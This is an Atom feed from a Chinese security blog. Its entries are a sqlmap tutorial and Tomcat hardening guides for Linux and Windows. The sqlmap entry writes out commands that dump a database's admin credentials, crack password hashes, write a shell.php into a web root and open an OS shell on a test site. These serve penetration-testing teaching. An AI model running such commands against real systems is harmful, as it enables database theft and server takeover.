atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Braid&#39;s Blog</title>
  <subtitle>攻城狮，黑客，网络安全爱好者</subtitle>
  <link href="/atom.xml" rel="self"/>
  
  <link href="http://www.cnbraid.com/"/>
  <updated>2016-06-24T01:33:36.061Z</updated>
  <id>http://www.cnbraid.com/</id>
  
  <author>
    <name>Braid信息安全博客</name>
    <email>hackbraid@gmail.com</email>
  </author>
  
  <generator uri="http://hexo.io/">Hexo</generator>
  
  <entry>
    <title>sqlmap基础</title>
    <link href="http://www.cnbraid.com/2016/06/20/sqlmap%E5%9F%BA%E7%A1%80/"/>
    <id>http://www.cnbraid.com/2016/06/20/sqlmap基础/</id>
    <published>2016-06-20T02:39:50.000Z</published>
    <updated>2016-06-24T01:33:36.061Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_sqlmap简介&quot;&gt;0x01 sqlmap简介&lt;/h2&gt;&lt;p&gt;SQLMAP是一个开源的渗透测试工具，它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎，适用于高级渗透测试用户，不仅可以获得不同数据库的指纹信息，还可以从数据库中提取数据，此外还能够处理潜在的文件系统以及通过数据连接执行系统命令等，所以SQLMAP是渗透测试者必备的一项工具，而这篇分享正式对sqlmap基础用法和一些深入的高级用法进行讲解。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmaplogo.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_一个案例&quot;&gt;0x02 一个案例&lt;/h2&gt;&lt;p&gt;&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;&lt;br&gt;当给sqlmap这么一个url的时候，它会做如下工作（功能）：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;1、识别出哪种数据库&lt;br&gt;2、判断可注入的参数&lt;br&gt;3、判断可以用那种SQL注入技术来注入&lt;br&gt;4、根据用户选择，读取哪些数据&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;我们打开sqlmap跑一下上面这个url，首先他识别出来是MySQL数据库如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap0.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;识别可注入的参数，这里就是参数id如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap2.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;判断那种SQL注入技术来进行注入，如下图，id这个注入点支持布尔型盲注、报错注入、基于时间的盲注和联合查询注入这四种类型&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap3.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;获取数据库用户名&quot;&gt;获取数据库用户名&lt;/h3&gt;&lt;p&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ —current-user&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap4.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;获取当前的数据库&quot;&gt;获取当前的数据库&lt;/h3&gt;&lt;p&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ —current-db&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap5.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;获取当前数据库中所有的表&quot;&gt;获取当前数据库中所有的表&lt;/h3&gt;&lt;p&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ -D test —tables&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap6.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;获取当前数据库中某个表的表结构&quot;&gt;获取当前数据库中某个表的表结构&lt;/h3&gt;&lt;p&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ -D test -T admin —columns&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap7.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;Dump数据（脱裤）&quot;&gt;Dump数据（脱裤）&lt;/h3&gt;&lt;p&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ -D test -T admin -C name,pass —dump&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap8.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_检测端相关的参数&quot;&gt;0x03 检测端相关的参数&lt;/h2&gt;&lt;h3 id=&quot;检测POST请求中的参数&quot;&gt;检测POST请求中的参数&lt;/h3&gt;&lt;p&gt;参数：—data&lt;br&gt;此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST的参数。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php&lt;/a&gt;“ —data=”id=1”&lt;/p&gt;
&lt;h3 id=&quot;检测COOKIE请求中的参数&quot;&gt;检测COOKIE请求中的参数&lt;/h3&gt;&lt;p&gt;参数：—cookie,—load-cookies,—drop-set-cookie&lt;br&gt;这个参数在以下两个方面很有用：&lt;br&gt;1、注入点是需要登陆后才可以注入的时候。&lt;br&gt;2、需要测试cookie里参数的注入时。&lt;br&gt;可以通过抓包把cookie获取到，复制出来，然后加到—cookie参数里。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ —cookie=”sessionid=7f658c3b91d10ae”&lt;br&gt;当设置—level的参数设定为2或者2以上的时候，sqlmap会尝试注入Cookie参数。&lt;br&gt;PS：还可以设置HTTP User-Agent头、Referer头或者额外的HTTP头并进行相应的头部注入，自行查询。&lt;/p&gt;
&lt;h3 id=&quot;指定测试参数&quot;&gt;指定测试参数&lt;/h3&gt;&lt;p&gt;参数：-p,—skip&lt;br&gt;sqlmap默认测试所有的GET和POST参数，但是你可以手动用-p参数设置想要测试的参数。例如： -p “id,user-anget”&lt;br&gt;当你使用—level的值很大但是有个别参数不想测试的时候可以使用—skip参数。&lt;br&gt;例如：—skip=”user-angent.referer”&lt;br&gt;在有些时候web服务器使用了URL重写，导致无法直接使用sqlmap测试参数，可以在想测试的参数后面加&lt;em&gt;&lt;br&gt;例如：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://targeturl/param1/value1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://targeturl/param1/value1&lt;/a&gt;&lt;/em&gt;/param2/value2/“&lt;br&gt;sqlmap将会测试value1的位置是否可注入。&lt;br&gt;指定数据库**&lt;br&gt;参数：—dbms&lt;br&gt;默认情况系sqlmap会自动的探测web应用后端的数据库是什么，sqlmap支持的数据库有：&lt;br&gt;MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2&lt;/p&gt;
&lt;h3 id=&quot;注入payload&quot;&gt;注入payload&lt;/h3&gt;&lt;p&gt;参数：—prefix,—suffix&lt;br&gt;在有些环境中，需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。&lt;br&gt;例如，代码中是这样调用数据库的：&lt;br&gt;$query = “SELECT &lt;em&gt; FROM users WHERE id=(’” . $_GET[’id’] . “’) LIMIT 0, 1”;&lt;br&gt;这时你就需要—prefix和—suffix参数了：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://targeturl/sqlmap/mysql/get_str_brackets.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://targeturl/sqlmap/mysql/get_str_brackets.php?id=1&lt;/a&gt;“ -p id —prefix “’)” —suffix “AND (’abc’=’abc”&lt;br&gt;这样执行的SQL语句变成：&lt;br&gt;$query = “SELECT &lt;/em&gt; FROM users WHERE id=(’1’) &lt;payload&gt; AND (’abc’=’abc’) LIMIT 0, 1”; &lt;/payload&gt;&lt;/p&gt;
&lt;h3 id=&quot;指定数据库服务器系统&quot;&gt;指定数据库服务器系统&lt;/h3&gt;&lt;p&gt;参数：—os&lt;br&gt;默认情况下sqlmap会自动的探测数据库服务器系统，支持的系统有：Linux、Windows。&lt;/p&gt;
&lt;h3 id=&quot;指定sqlmap的探测技术&quot;&gt;指定sqlmap的探测技术&lt;/h3&gt;&lt;p&gt;参数：—technique&lt;br&gt;这个参数可以指定sqlmap使用的探测技术，默认情况下会测试所有的方式。&lt;br&gt;支持的探测方式如下：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;B: Boolean-based blind SQL injection（布尔型注入）&lt;br&gt;E: Error-based SQL injection（报错型注入）&lt;br&gt;U: UNION query SQL injection（可联合查询注入）&lt;br&gt;S: Stacked queries SQL injection（可多语句查询注入）&lt;br&gt;T: Time-based blind SQL injection（基于时间延迟注入）&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id=&quot;设定延迟注入的时间&quot;&gt;设定延迟注入的时间&lt;/h3&gt;&lt;p&gt;参数：—time-sec&lt;br&gt;当使用继续时间的盲注时，时刻使用—time-sec参数设定延时时间，默认是5秒。&lt;/p&gt;
&lt;h3 id=&quot;探测等级&quot;&gt;探测等级&lt;/h3&gt;&lt;p&gt;参数：—level&lt;br&gt;共有五个等级，默认为1，sqlmap使用的payload可以在xml/payloads.xml中看到，你也可以根据相应的格式添加自己的payload。&lt;br&gt;这个参数不仅影响使用哪些payload同时也会影响测试的注入点，GET和POST的数据都会测试，HTTP Cookie在level为2的时候就会测试，HTTP User-Agent/Referer头在level为3的时候就会测试。&lt;br&gt;总之在你不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值。&lt;/p&gt;
&lt;h3 id=&quot;风险等级&quot;&gt;风险等级&lt;/h3&gt;&lt;p&gt;参数：—risk&lt;br&gt;共有四个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。&lt;br&gt;在有些时候，例如在UPDATE的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险。&lt;br&gt;测试的语句同样可以在xml/payloads.xml中找到，你也可以自行添加payload。&lt;/p&gt;
&lt;h2 id=&quot;0x04_数据端相关的参数&quot;&gt;0x04 数据端相关的参数&lt;/h2&gt;&lt;h3 id=&quot;当前用户&quot;&gt;当前用户&lt;/h3&gt;&lt;p&gt;参数：-current-user&lt;br&gt;在大多数据库中可以获取到管理数据的用户。&lt;/p&gt;
&lt;h3 id=&quot;当前数据库&quot;&gt;当前数据库&lt;/h3&gt;&lt;p&gt;参数：—current-db&lt;br&gt;返还当前连接的数据库。&lt;/p&gt;
&lt;h3 id=&quot;当前用户是否为管理&quot;&gt;当前用户是否为管理&lt;/h3&gt;&lt;p&gt;参数：—is-dba&lt;br&gt;判断当前的用户是否为管理，是的话会返回True。&lt;/p&gt;
&lt;h3 id=&quot;列数据库管理的用户&quot;&gt;列数据库管理的用户&lt;/h3&gt;&lt;p&gt;参数：—users&lt;br&gt;当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户。&lt;/p&gt;
&lt;h3 id=&quot;列出并破解数据库用户的hash&quot;&gt;列出并破解数据库用户的hash&lt;/h3&gt;&lt;p&gt;参数：—passwords&lt;br&gt;当前用户有权限读取包含用户密码的彪的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt; —passwords -v 1”&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap9.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;列出数据库管理员权限&quot;&gt;列出数据库管理员权限&lt;/h3&gt;&lt;p&gt;参数：—privileges&lt;br&gt;当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的权限，sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看哪个用户的权限。&lt;/p&gt;
&lt;h3 id=&quot;列出数据库管理员角色&quot;&gt;列出数据库管理员角色&lt;/h3&gt;&lt;p&gt;参数：—roles&lt;br&gt;当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的角色，也可以用-U参数指定你想看哪个用户的角色。&lt;br&gt;仅适用于当前数据库是Oracle的时候。&lt;/p&gt;
&lt;h3 id=&quot;列出数据库系统的数据库&quot;&gt;列出数据库系统的数据库&lt;/h3&gt;&lt;p&gt;参数：—dbs&lt;br&gt;当前用户有权限读取包含所有数据库列表信息的表中的时候，即可列出所有的数据库。&lt;/p&gt;
&lt;h3 id=&quot;列举数据库表&quot;&gt;列举数据库表&lt;/h3&gt;&lt;p&gt;参数：—tables,—exclude-sysdbs,-D&lt;br&gt;当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出一个特定数据的所有表。&lt;br&gt;如果你不提供-D参数来列指定的一个数据的时候，sqlmap会列出数据库所有库的所有表。&lt;br&gt;—exclude-sysdbs参数是指包含了所有的系统数据库。&lt;br&gt;需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是数据库名称。&lt;/p&gt;
&lt;h3 id=&quot;列举数据库表中的字段&quot;&gt;列举数据库表中的字段&lt;/h3&gt;&lt;p&gt;参数：—columns,-C,-T,-D&lt;br&gt;当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出指定数据库表中的字段，同时也会列出字段的数据类型。&lt;br&gt;如果没有使用-D参数指定数据库时，默认会使用当前数据库。&lt;/p&gt;
&lt;h3 id=&quot;获取表中数据个数&quot;&gt;获取表中数据个数&lt;/h3&gt;&lt;p&gt;参数：—count&lt;br&gt;有时候用户只想获取表中的数据个数而不是具体的内容，那么就可以使用这个参数。&lt;/p&gt;
&lt;h3 id=&quot;运行自定义的SQL语句&quot;&gt;运行自定义的SQL语句&lt;/h3&gt;&lt;p&gt;参数：—sql-query,—sql-shell&lt;br&gt;sqlmap会自动检测确定使用哪种SQL注入技术，如何插入检索语句。&lt;br&gt;如果是SELECT查询语句，sqlap将会输出结果。如果是通过SQL注入执行其他语句，需要测试是否支持多语句执行SQL语句。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt; —sql-query”&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap10.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x05_文件操作相关的参数&quot;&gt;0x05 文件操作相关的参数&lt;/h2&gt;&lt;h3 id=&quot;读取文件&quot;&gt;读取文件&lt;/h3&gt;&lt;p&gt;参数：—file-read&lt;br&gt;当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。&lt;/p&gt;
&lt;h3 id=&quot;将本地的文件写入到web服务器&quot;&gt;将本地的文件写入到web服务器&lt;/h3&gt;&lt;p&gt;参数：—file-write,—file-dest&lt;br&gt;当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ —file-write=”E:\1.txt” —file-dest=”D:\winsoftware\wamp\www\sqltest\shell.php”&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap11.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;运行任意操作系统命令&quot;&gt;运行任意操作系统命令&lt;/h3&gt;&lt;p&gt;参数：—os-cmd,—os-shell&lt;br&gt;当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。&lt;br&gt;在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()。&lt;br&gt;那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认禁制），sqlmap会重新启用它，如果不存在，会自动创建。&lt;br&gt;例子：&lt;br&gt;python sqlmap.py -u “&lt;a href=&quot;http://codeaudit.org/sqltest/news.php?id=1&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://codeaudit.org/sqltest/news.php?id=1&lt;/a&gt;“ —os-shell&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmap12.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;主要参考：&lt;a href=&quot;http://drops.wooyun.org/tips/143&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://drops.wooyun.org/tips/143&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2016/06/22/sqlmap基础/&quot;&gt;http://www.cnbraid.com/2016/06/22/sqlmap基础/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_sqlmap简介&quot;&gt;0x01 sqlmap简介&lt;/h2&gt;&lt;p&gt;SQLMAP是一个开源的渗透测试工具，它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎，适用于高级渗透测试用户，不仅可以获得不同数据库的指纹信息，还可以从数据库中提取数据，此外还能够处理潜在的文件系统以及通过数据连接执行系统命令等，所以SQLMAP是渗透测试者必备的一项工具，而这篇分享正式对sqlmap基础用法和一些深入的高级用法进行讲解。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmaplogo.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="渗透利器" scheme="http://www.cnbraid.com/categories/%E6%B8%97%E9%80%8F%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="sqlmap" scheme="http://www.cnbraid.com/tags/sqlmap/"/>
    
      <category term="工具" scheme="http://www.cnbraid.com/tags/%E5%B7%A5%E5%85%B7/"/>
    
  </entry>
  
  <entry>
    <title>Linux下tomcat安全配置</title>
    <link href="http://www.cnbraid.com/2016/06/17/Linux%E4%B8%8Btomcat%E5%AE%89%E5%85%A8%E9%85%8D%E7%BD%AE/"/>
    <id>http://www.cnbraid.com/2016/06/17/Linux下tomcat安全配置/</id>
    <published>2016-06-17T06:39:50.000Z</published>
    <updated>2016-06-24T08:59:02.283Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x00_删除默认目录&quot;&gt;0x00 删除默认目录&lt;/h2&gt;&lt;p&gt;安装完tomcat后，删除$CATALINA_HOME/webapps下默认的所有目录文件&lt;/p&gt;
&lt;figure class=&quot;highlight gradle&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;rm -rf &lt;span class=&quot;regexp&quot;&gt;/srv/&lt;/span&gt;apache-tomcat&lt;span class=&quot;regexp&quot;&gt;/webapps/&lt;/span&gt;*&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;
&lt;h2 id=&quot;0x01_用户管理&quot;&gt;0x01 用户管理&lt;/h2&gt;&lt;p&gt;如果不需要通过web部署应用，建议注释或删除tomcat-users.xml下用户权限相关配置&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416373714302117.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_隐藏tomcat版本信息&quot;&gt;0x02 隐藏tomcat版本信息&lt;/h2&gt;&lt;p&gt;方法一&lt;/p&gt;
&lt;p&gt;修改$CATALINA_HOME/conf/server.xml,在Connector节点添加server字段，示例如下&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637392245625.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637411365536.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;方法二&lt;/p&gt;
&lt;p&gt;修改$CATALINA_HOME/lib/catalina.jar::org/apache/catalina/util/ServerInfo.properties&lt;/p&gt;
&lt;p&gt;默认情况下如图&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637426629645.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637448444455.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;用户可自定义修改server.info字段和server.number字段，示例修改如下图所示。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637456906065.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637477579375.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_关闭自动部署&quot;&gt;0x03 关闭自动部署&lt;/h2&gt;&lt;p&gt;如果不需要自动部署，建议关闭自动部署功能。在$CATALINA_HOME/conf/server.xml中的host字段，修改unpackWARs=”false” autoDeploy=”false”。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637481537685.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x04_自定义错误页面&quot;&gt;0x04 自定义错误页面&lt;/h2&gt;&lt;p&gt;修改web.xml,自定义40x、50x等容错页面，防止信息泄露。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/201605241637504858695.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x05_禁止列目录（高版本默认已禁止）&quot;&gt;0x05 禁止列目录（高版本默认已禁止）&lt;/h2&gt;&lt;p&gt;修改web.xml&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375139392105.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x06_AJP端口管理&quot;&gt;0x06 AJP端口管理&lt;/h2&gt;&lt;p&gt;AJP是为 Tomcat 与 HTTP 服务器之间通信而定制的协议，能提供较高的通信速度和效率。如果tomcat前端放的是apache的时候，会使用到AJP这个连接器。前端如果是由nginx做的反向代理的话可以不使用此连接器，因此需要注销掉该连接器。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375323093118.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x07_服务权限控制&quot;&gt;0x07 服务权限控制&lt;/h2&gt;&lt;p&gt;tomcat以非root权限启动，应用部署目录权限和tomcat服务启动用户分离，比如tomcat以tomcat用户启动，而部署应用的目录设置为nobody用户750。&lt;/p&gt;
&lt;h2 id=&quot;0x08_启用cookie的HttpOnly属性&quot;&gt;0x08 启用cookie的HttpOnly属性&lt;/h2&gt;&lt;p&gt;修改$CATALINA_HOME/conf/context.xml，添加&lt;context usehttponly=&quot;true&quot;&gt;,如下图所示&lt;/context&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375437308125.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;测试结果&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375527932134.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375763846144.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;配置cookie的secure属性，在web.xml中sesion-config节点配置cooker-config，此配置只允许cookie在加密方式下传输。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416375941520153.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;测试结果&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20160524/2016052416380093567163.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;注：此文章获得乌云drops授权转载，©乌云知识库版权所有 未经许可 禁止转载&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;文章来源：&lt;/strong&gt;&lt;br&gt;&lt;a href=&quot;http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/15888&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/15888&lt;/a&gt;&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x00_删除默认目录&quot;&gt;0x00 删除默认目录&lt;/h2&gt;&lt;p&gt;安装完tomcat后，删除$CATALINA_HOME/webapps下默认的所有目录文件&lt;/p&gt;
&lt;figure class=&quot;highlight gradle&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;rm -rf &lt;span class=&quot;regexp&quot;&gt;/srv/&lt;/span&gt;apache-tomcat&lt;span class=&quot;regexp&quot;&gt;/webapps/&lt;/span&gt;*&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
    
    </summary>
    
      <category term="系统加固" scheme="http://www.cnbraid.com/categories/%E7%B3%BB%E7%BB%9F%E5%8A%A0%E5%9B%BA/"/>
    
    
      <category term="Linux" scheme="http://www.cnbraid.com/tags/Linux/"/>
    
      <category term="tomcat" scheme="http://www.cnbraid.com/tags/tomcat/"/>
    
      <category term="加固" scheme="http://www.cnbraid.com/tags/%E5%8A%A0%E5%9B%BA/"/>
    
      <category term="服务器" scheme="http://www.cnbraid.com/tags/%E6%9C%8D%E5%8A%A1%E5%99%A8/"/>
    
  </entry>
  
  <entry>
    <title>Windows下tomcat安全配置</title>
    <link href="http://www.cnbraid.com/2016/06/17/tomcat%E5%AE%89%E5%85%A8%E9%85%8D%E7%BD%AE/"/>
    <id>http://www.cnbraid.com/2016/06/17/tomcat安全配置/</id>
    <published>2016-06-17T02:39:50.000Z</published>
    <updated>2016-06-24T08:58:55.443Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x00_Tomcat简介&quot;&gt;0x00 Tomcat简介&lt;/h2&gt;&lt;p&gt;tomcat是一个开源Web服务器，基于Tomcat的Web运行效率高，可以在一般的硬件平台上流畅运行，因此，颇受Web站长的青睐。不过，在默认配置下其存在一定的安全隐患，可被恶意攻击。&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x01_测试环境&quot;&gt;0x01 测试环境&lt;/h2&gt;&lt;p&gt;Win2003&lt;br&gt;Tomcat6.0.18 安装版&lt;/p&gt;
&lt;h2 id=&quot;0x02_安全验证&quot;&gt;0x02 安全验证&lt;/h2&gt;&lt;p&gt;一.登陆后台&lt;/p&gt;
&lt;p&gt;首先在win2003上部署Tomcat,一切保持默认。&lt;/p&gt;
